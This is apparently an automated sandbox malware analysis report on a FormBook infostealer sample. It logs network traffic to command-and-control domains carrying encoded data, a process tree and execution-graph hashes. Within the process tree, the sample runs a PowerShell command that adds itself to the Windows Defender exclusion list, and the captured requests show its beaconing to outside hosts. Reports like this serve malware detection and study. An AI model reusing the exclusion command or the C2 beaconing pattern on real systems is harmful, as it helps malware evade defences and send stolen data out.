                                                                                Cache-Control: max-age=0
                                                                                Connection: close
                                                                                Content-Length: 1239
                                                                                Referer: http://www.ana-silverco.shop/ez1t/
                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                                Data Ascii: fh=3ds4vL+R3/6ZZzh8gWx/K4qN/p9L9B6HC7S5gKtV5kdXfFEL+LGOV7PAJy2+GMxjXyJUCKQ55ZA4/cNzJe6OMixjEPfVXyAGzBDsNQo4WpNLRv8ZUL3+CYp3Ec9UxED5iLxqMqasmrZpVaZ/AahEwTcQ1iQl22PsSPiSmcDA9CPSA8WyES7FhDxoi5A4viGLyLmTqxH8ONBocoo0Yn83cRviJB0gt+++okVuGmPPWzFhQkm9ynlc/L4GrVz5k2S91VP2JNxXe0EfONzJZjam2lJ2ppCEJxVRxePzVPIEtPsAkquwMfSf8Rltq+D6yzUeQOyQ+aT9tO5XY6BucOqkfBJFuM12Yj4xJb8+XQITJ95I+ZuT5EwlYRGHiPVVlxPhLvhyZ/SaSGUXZHpVoTw6YJcgyyaeMwfWF8/7XMsahg2isj2XOBEDkP4m1kOS8H6k0NfM8JBlpR4r61fCc5cPVDt/gtjCMQbpq629DdpqN3COHEdtqBD6bDVZ9gn3D2xd+Vk2LhxModUiNNlI7nYpitlIP4GtDzeVKDasyFQBSDNBIBns6NxJ/i2gpU/uMWoeogZNio23TlJbONlJerVnbivZXl83IEDpEO8RscUpkwBoYcHoVBe4Kyt14KgWMUKky+YOyGR47pDNJpVNW7yFKsUgGNe3bu05LZTX3C+iJV+Rcct93ujvIu/UstLmv341ikjaYU8DQVV9S0zVkbYZygbA8KOuiXULWAoy6LyqH6QE5ypJfAz++zF/Sl4MsbeWCbafLT/woz7Ne+tZTLrJwcq5EPy88mMnybkzI4cWgGwuuZt5blvI7n166TW3hmQhudO5syBPQS4D+3OVc6ekSOs8NEVk5/KftvDWk+RepKGbEguAsgT7Y+5ZUwUiHsLdfAJZdXSRZl5XRsT/fr2jLMyS9iK6S9qzfM+aJefJVWPn5HOLB/qK6zE3RdQI6gryvtxL91B5pKo0+PjsXI/ILUEjH9utJVcYYLRSaNCSaD11xUnUP [TRUNCATED]
                                                                                Dec 3, 2024 14:24:22.313878059 CET  900  IN  HTTP/1.1 404 Not Found
                                                                                Date: Tue, 03 Dec 2024 13:24:22 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                X-Powered-By: PHP/7.4.33
                                                                                CF-Cache-Status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L1LLDWAuj1tGb4tlsIjo1zim4JJi11Ajfi0xIg62lVg4ZxyrI%2BwboB2Oi1PLdiv13A7Wjspr2TKkEd6qrvF%2BauxzDq9SEEto%2BXybNRxqm2Qz41AVB5x6%2B0qOeTBPAIiDTRO%2BUlsKQVk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8ec3e065ea677c94-EWR
                                                                                Content-Encoding: gzip
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1953&min_rtt=1953&rtt_var=976&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1829&delivery_rate=0&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Dec 3, 2024 14:24:22.314310074 CET  5  IN


                                                                                Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                40  192.168.2.5  50023  172.67.156.195  80  1536  C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
                                                                                Timestamp  Bytes transferred  Direction  Data
                                                                                Dec 3, 2024 14:24:23.821989059 CET  529  OUT  GET /ez1t/?fh=6fEYs/GnwtqWMztB9xFdTpyVwIgq4y66Lrjdt5EE8ztyQFcx1ZWnbcrnPkjaT/5aXxdNApMw2aINlctYTPbgIAplS6fcUEAY0yLCPgkUVbpQbsIDX53LfadnD8pal0m+9g==&jnGlY=dHeXwH1PkJZDr HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US
                                                                                Host: www.ana-silverco.shop
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                                Dec 3, 2024 14:24:25.015377045 CET  842  IN  HTTP/1.1 404 Not Found
                                                                                Date: Tue, 03 Dec 2024 13:24:24 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                X-Powered-By: PHP/7.4.33
                                                                                CF-Cache-Status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=siPmq2UDGReQJdfjNvaTJJC5uVCwIPzIA0ubei6FN3TGEhLOCiAdW4ZHaX3RIcOt7I8DiYuuju6FaYxiklNIhGpuMFy56qBI0ZTXk5vM37h8m0aADqezIYhBorYL45jh5mbMNm%2ByDMk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8ec3e076fa104239-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2310&min_rtt=2310&rtt_var=1155&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=529&delivery_rate=0&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                                Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                41  192.168.2.5  50024  108.179.253.197  80  1536  C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
                                                                                Timestamp  Bytes transferred  Direction  Data
                                                                                Dec 3, 2024 14:24:31.012573957 CET  804  OUT  POST /qimy/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.bloodbalancecaps.shop
                                                                                Origin: http://www.bloodbalancecaps.shop
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: max-age=0
                                                                                Connection: close
                                                                                Content-Length: 203
                                                                                Referer: http://www.bloodbalancecaps.shop/qimy/
                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                                Data Ascii: fh=kUcxP68a51TnMtTgRR41KILBbd8WUILOtjN+MUx9pRWXN7N1ihbKP4Ylw1b+5CD4ydIFbKIpP3IaFhcriTOMicZNh9wme6geYLxvuZBnqkJwWsyXvHAkDlrP9wJbT6Ll19O/qpJRSCmj8714pg4qLdrlGT/Q5fzqBpKQDpwmTTst4U6Nyz8eQp+h6UXXnTFI64nF42A=
                                                                                Dec 3, 2024 14:24:32.351155043 CET  1236  IN  HTTP/1.1 404 Not Found
                                                                                Date: Tue, 03 Dec 2024 13:24:31 GMT
                                                                                Server: Apache
                                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                Link: <https://bloodbalancecaps.shop/wp-json/>; rel="https://api.w.org/"
                                                                                Upgrade: h2,h2c
                                                                                Connection: Upgrade
                                                                                Vary: Accept-Encoding
                                                                                Content-Encoding: gzip
                                                                                X-Endurance-Cache-Level: 2
                                                                                X-nginx-cache: WordPress
                                                                                Content-Length: 15183
                                                                                Content-Type: text/html; charset=UTF-8


                                                                                Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                                                                42          192.168.2.5  50025        108.179.253.197  80                1536  C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
                                                                                Timestamp  Bytes transferred  Direction  Data
                                                                                Dec 3, 2024 14:24:33.704130888 CET  824  OUT  POST /qimy/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.bloodbalancecaps.shop
                                                                                Origin: http://www.bloodbalancecaps.shop
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: max-age=0
                                                                                Connection: close
                                                                                Content-Length: 223
                                                                                Referer: http://www.bloodbalancecaps.shop/qimy/
                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                                Dec 3, 2024 14:24:35.024609089 CET  1236  IN  HTTP/1.1 404 Not Found
                                                                                Date: Tue, 03 Dec 2024 13:24:34 GMT
                                                                                Server: Apache
                                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                Link: <https://bloodbalancecaps.shop/wp-json/>; rel="https://api.w.org/"
                                                                                Upgrade: h2,h2c
                                                                                Connection: Upgrade
                                                                                Vary: Accept-Encoding
                                                                                Content-Encoding: gzip
                                                                                X-Endurance-Cache-Level: 2
                                                                                X-nginx-cache: WordPress
                                                                                Content-Length: 15183
                                                                                Content-Type: text/html; charset=UTF-8


                                                                                Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                                                                43          192.168.2.5  50026        108.179.253.197  80                1536  C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
                                                                                Timestamp  Bytes transferred  Direction  Data
                                                                                Dec 3, 2024 14:24:36.372147083 CET  1841  OUT  POST /qimy/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.bloodbalancecaps.shop
                                                                                Origin: http://www.bloodbalancecaps.shop
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: max-age=0
                                                                                Connection: close
                                                                                Content-Length: 1239
                                                                                Referer: http://www.bloodbalancecaps.shop/qimy/
                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                                Dec 3, 2024 14:24:37.768307924 CET  1236  IN  HTTP/1.1 404 Not Found
                                                                                Date: Tue, 03 Dec 2024 13:24:37 GMT
                                                                                Server: Apache
                                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                Link: <https://bloodbalancecaps.shop/wp-json/>; rel="https://api.w.org/"
                                                                                Upgrade: h2,h2c
                                                                                Connection: Upgrade
                                                                                Vary: Accept-Encoding
                                                                                Content-Encoding: gzip
                                                                                X-Endurance-Cache-Level: 2
                                                                                X-nginx-cache: WordPress
                                                                                Content-Length: 15183
                                                                                Content-Type: text/html; charset=UTF-8


                                                                                Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                                                                44          192.168.2.5  50027        108.179.253.197  80                1536  C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
                                                                                Timestamp  Bytes transferred  Direction  Data
                                                                                Dec 3, 2024 14:24:39.042434931 CET  533  OUT  GET /qimy/?fh=pW0RMLgj0GfOcOfjNX4uT4TVFqcCQcjlkxVMBko6hSeAFIxekhL2UZBCo0je72bj3vEDDI4oJlEiagEhjxGQsrVSq+51atMbfrB/quJS6koXR/q8qHQdflns0zhBJovgpw==&jnGlY=dHeXwH1PkJZDr HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US
                                                                                Host: www.bloodbalancecaps.shop
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                                Dec 3, 2024 14:24:40.264003038 CET570INHTTP/1.1 301 Moved Permanently
                                                                                Date: Tue, 03 Dec 2024 13:24:40 GMT
                                                                                Server: nginx/1.23.4
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Content-Length: 0
                                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                X-Redirect-By: WordPress
                                                                                Location: http://bloodbalancecaps.shop/qimy/?fh=pW0RMLgj0GfOcOfjNX4uT4TVFqcCQcjlkxVMBko6hSeAFIxekhL2UZBCo0je72bj3vEDDI4oJlEiagEhjxGQsrVSq+51atMbfrB/quJS6koXR/q8qHQdflns0zhBJovgpw==&jnGlY=dHeXwH1PkJZDr
                                                                                X-Endurance-Cache-Level: 2
                                                                                X-nginx-cache: WordPress
                                                                                X-Server-Cache: true
                                                                                X-Proxy-Cache: MISS



                                                                                Target ID:0
                                                                                Start time:08:20:37
                                                                                Start date:03/12/2024
                                                                                Path:C:\Users\user\Desktop\SW_5724.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\Desktop\SW_5724.exe"
                                                                                Imagebase:0x550000
                                                                                File size:814'592 bytes
                                                                                MD5 hash:CF8C34B20F0E8654371C004272B4DEF6
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:low
                                                                                Has exited:true

                                                                                Target ID:3
                                                                                Start time:08:20:38
                                                                                Start date:03/12/2024
                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SW_5724.exe"
                                                                                Imagebase:0xf30000
                                                                                File size:433'152 bytes
                                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:4
                                                                                Start time:08:20:38
                                                                                Start date:03/12/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff6d64d0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:5
                                                                                Start time:08:20:38
                                                                                Start date:03/12/2024
                                                                                Path:C:\Users\user\Desktop\SW_5724.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Users\user\Desktop\SW_5724.exe"
                                                                                Imagebase:0x290000
                                                                                File size:814'592 bytes
                                                                                MD5 hash:CF8C34B20F0E8654371C004272B4DEF6
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:low
                                                                                Has exited:true

                                                                                Target ID:6
                                                                                Start time:08:20:38
                                                                                Start date:03/12/2024
                                                                                Path:C:\Users\user\Desktop\SW_5724.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\Desktop\SW_5724.exe"
                                                                                Imagebase:0xf50000
                                                                                File size:814'592 bytes
                                                                                MD5 hash:CF8C34B20F0E8654371C004272B4DEF6
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2335532863.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2430161361.0000000007360000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2341900856.00000000027B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:low
                                                                                Has exited:true

                                                                                Target ID:7
                                                                                Start time:08:20:41
                                                                                Start date:03/12/2024
                                                                                Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                Imagebase:0x7ff6ef0c0000
                                                                                File size:496'640 bytes
                                                                                MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:9
                                                                                Start time:08:20:58
                                                                                Start date:03/12/2024
                                                                                Path:C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe"
                                                                                Imagebase:0x190000
                                                                                File size:140'800 bytes
                                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.4515540359.0000000003660000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:high
                                                                                Has exited:false

                                                                                Target ID:10
                                                                                Start time:08:21:00
                                                                                Start date:03/12/2024
                                                                                Path:C:\Windows\SysWOW64\regini.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Windows\SysWOW64\regini.exe"
                                                                                Imagebase:0x7d0000
                                                                                File size:41'472 bytes
                                                                                MD5 hash:C99C3BB423097FCF4990539FC1ED60E3
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.4514408962.0000000000460000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.4514626352.0000000000700000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.4515595244.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:moderate
                                                                                Has exited:false

                                                                                Target ID:11
                                                                                Start time:08:21:15
                                                                                Start date:03/12/2024
                                                                                Path:C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe"
                                                                                Imagebase:0x190000
                                                                                File size:140'800 bytes
                                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.4517476095.0000000005080000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:high
                                                                                Has exited:false

                                                                                Target ID:13
                                                                                Start time:08:21:36
                                                                                Start date:03/12/2024
                                                                                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                Imagebase:0x7ff79f9e0000
                                                                                File size:676'768 bytes
                                                                                MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true


                                                                                  Execution Graph

                                                                                  Execution Coverage:15.2%
                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                  Signature Coverage:0%
                                                                                  Total number of Nodes:22
                                                                                  Total number of Limit Nodes:2

                                                                                  Control-flow Graph

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2081731223.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_27f0000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Teyq$Teyq
                                                                                  • API String ID: 0-268401272
                                                                                  • Opcode ID: 07bfd6e3f6eb127391a7760e4e7e16e7be1bae60d1d7293bb0ff516bb11b7108
                                                                                  • Instruction ID: 44784a3af72238b99253fb4dcef3908c985d93f1733f904ed4828c76950a6471
                                                                                  • Opcode Fuzzy Hash: 07bfd6e3f6eb127391a7760e4e7e16e7be1bae60d1d7293bb0ff516bb11b7108
                                                                                  • Instruction Fuzzy Hash: EA912332A0D681CFD7958B68C8509AAFBF2FF97310B1A909AD645AB35BC3309905CF51

                                                                                  Control-flow Graph

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2081731223.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_27f0000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Teyq$Teyq
                                                                                  • API String ID: 0-268401272
                                                                                  • Opcode ID: 80e882db4755d95798c1f19ddf5bd1f23457f96378540316a2a7bc6f44d8789b
                                                                                  • Instruction ID: 2be664965dc527a2449443e11fcec2f45238dc50943f7df460fc6542fdb03508
                                                                                  • Opcode Fuzzy Hash: 80e882db4755d95798c1f19ddf5bd1f23457f96378540316a2a7bc6f44d8789b
                                                                                  • Instruction Fuzzy Hash: E1910271A08285CFD785CF69C855AAAFBF1FF46310F1AC09AD645AB36BC3309905CB91

                                                                                  Control-flow Graph

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2081731223.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_27f0000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Teyq$Teyq
                                                                                  • API String ID: 0-268401272
                                                                                  • Opcode ID: 3eba086e91492596d4a9aedcfdea79f86af1689ca2df50227de13f01805bac07
                                                                                  • Instruction ID: 379efe3d64bbbda4fb14546325bbe200604079c1a422fa241637ddf378a0e9e2
                                                                                  • Opcode Fuzzy Hash: 3eba086e91492596d4a9aedcfdea79f86af1689ca2df50227de13f01805bac07
                                                                                  • Instruction Fuzzy Hash: 93910171A19285CFD790CB69C8549AAFBF1FF46310F1AC09AE645AB36BC330D905CB91

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2081731223.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_27f0000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Teyq$Teyq
                                                                                  • API String ID: 0-268401272
                                                                                  • Opcode ID: 3bb4a586a220b4e5b817ad316575b283c96167f9cc2dd9ffa4664ad7ee532732
                                                                                  • Instruction ID: e8efa4e53d166e4d859fdfee72832b72e0d102c8b7faba0f30dc363bf3b786f6
                                                                                  • Opcode Fuzzy Hash: 3bb4a586a220b4e5b817ad316575b283c96167f9cc2dd9ffa4664ad7ee532732
                                                                                  • Instruction Fuzzy Hash: CD912271A0C285CFD785CB69C8959AAFFF1FF4A310B1A809AD645AB367C3309905CB91

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2081731223.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_27f0000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Teyq$Teyq
                                                                                  • API String ID: 0-268401272
                                                                                  • Opcode ID: 0e0e74cd940acc0000e94d89c13dff89154f4e434d103a85bed36b79b3524d6c
                                                                                  • Instruction ID: 2e3a652fe305ed7495dc423f2080fd4cd173d7025c238897113f9f813379c19b
                                                                                  • Opcode Fuzzy Hash: 0e0e74cd940acc0000e94d89c13dff89154f4e434d103a85bed36b79b3524d6c
                                                                                  • Instruction Fuzzy Hash: CA812371A0C285CFD785CF69C855AAAFFF1FF46310B1680AAD645AB367C3309905CB91

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2081731223.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_27f0000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Teyq$Teyq
                                                                                  • API String ID: 0-268401272
                                                                                  • Opcode ID: 9dbf22f25c199fa88789511ccb8ec1170dd915445ed0fd663b212c4667677c8e
                                                                                  • Instruction ID: e2aee58e5a7385805781408c2d5b8182457d52c96939ea76cef9b3ff25af0e52
                                                                                  • Opcode Fuzzy Hash: 9dbf22f25c199fa88789511ccb8ec1170dd915445ed0fd663b212c4667677c8e
                                                                                  • Instruction Fuzzy Hash: 34812171A0C285CFD785CF69C895AAAFBF1FF46300B1A809AD645AB367C3309905CB91

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2081731223.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_27f0000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Teyq$Teyq
                                                                                  • API String ID: 0-268401272
                                                                                  • Opcode ID: fdc3b46c1cee2596dd33fbc30b9932147b3de20d9234eb85002212c4716fea67
                                                                                  • Instruction ID: 2a3943b6040647e40acc5620ff9afb41fff50635134e2a1cf206e6d3a51ed00a
                                                                                  • Opcode Fuzzy Hash: fdc3b46c1cee2596dd33fbc30b9932147b3de20d9234eb85002212c4716fea67
                                                                                  • Instruction Fuzzy Hash: 0A814431A0C286CFD7848B69C8556AAFFF2FF86310F1A806AD645EB357C7309905CB91

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2081731223.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_27f0000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Teyq$Teyq
                                                                                  • API String ID: 0-268401272
                                                                                  • Opcode ID: 30191bd74bfcb6f73439258ccfa26f8d49469e4ab076aa1917c6ae05e21d01a0
                                                                                  • Instruction ID: 59ee454b7ac12b6bda1c2c884027ca34f5af4ee6bb8532fdf5fac16b19bc2b63
                                                                                  • Opcode Fuzzy Hash: 30191bd74bfcb6f73439258ccfa26f8d49469e4ab076aa1917c6ae05e21d01a0
                                                                                  • Instruction Fuzzy Hash: BC813531A0C686CFD7858B68C8506AAFFF1FF46310F1A805AD645EB357C7309905CB91

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  Strings
                                                                                  Memory Dump Source
